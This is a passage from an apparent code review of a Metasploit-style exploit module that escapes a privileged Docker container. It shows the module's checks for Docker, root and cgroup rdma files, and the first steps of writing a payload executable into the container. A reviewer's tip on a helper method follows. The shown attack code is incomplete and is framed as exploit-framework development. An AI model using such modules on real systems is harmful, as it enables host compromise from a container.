modules/exploits/linux/local/docker_privileged_container_escape.rb

```diff
@@ -0,0 +1,153 @@
+                'Platform' => 'linux',
+                'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
+                'Targets' => [['Automatic', {}]],
+                'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },
+                'SessionTypes' => ['shell', 'meterpreter'],
+                'DefaultTarget' => 0,
+                'References' => [
+                    ['EDB', '47147'],
+                    ['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
+                    ['URL', 'https://github.com/stealthcopter/deepce']
+                ],
+                'DisclosureDate' => 'Jul 17 2019' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm
+            }
+        )
+    )
+    register_advanced_options(
+        [
+            OptBool.new('ForceExploit', [false, 'Override check result', false]),
+            OptBool.new('ForcePayloadSearch', [false, 'Search for payload on the file system rather than copying it from container', false]),
+            OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', '/tmp']),
+            OptString.new('WritableHostDir', [true, 'A directory where we can write files inside on the host', '/tmp']),
+        ]
+    )
+  end
+
+  def base_dir_container
+    datastore['WritableContainerDir'].to_s
+  end
+
+  def base_dir_host
+    datastore['WritableHostDir'].to_s
+  end
+
+  # Get the container id and check it's the expected 64 char hex string, otherwise return nil
+  def container_id
+    id = cmd_exec('basename $(cat /proc/1/cpuset)').chomp
+    unless id.match(/\A[\h]{64}\z/).nil?
+      id
+    end
+  end
+
+  # Check we have all the prerequisites to perform the escape
+  def check
+    # are in a docker container
+    unless file?('/.dockerenv')
+      return CheckCode::Safe('Not inside a Docker container')
+    end
+
+    # is root user
+    unless is_root?
+      return Exploit::CheckCode::Safe('Exploit requires root inside container')
+    end
+
+    # are rdma files present in /sys/
+    path = cmd_exec('ls -x /s*/fs/c*/*/r* | head -n1')
+    unless path.start_with? '/'
+      return Exploit::CheckCode::Safe('Required /sys/ files for exploitation not found, possibly old version of docker or not a privileged container.')
+    end
+
+    CheckCode::Appears('Inside Docker container and target appears vulnerable')
+  end
+
+  def exploit
+    unless writable? base_dir_container
+      fail_with Failure::BadConfig, "#{base_dir_container} is not writable"
+    end
+
+    pl = generate_payload_exe
+    exe_path = "#{base_dir_container}/#{rand_text_alpha(6..11)}"
+    print_status("Writing payload executable to '#{exe_path}'")
+
+    write_file(exe_path, pl)
+    register_file_for_cleanup(exe_path)
+
+    print_status('Executing script to exploit privileged container')
+    vprint_status(cmd_exec("chmod +x #{exe_path}"))
```

Comment:
There's a method that does both the upload and chmod called `upload_and_chmodx` that should work here.

Reply:
cool, thanks for the tip!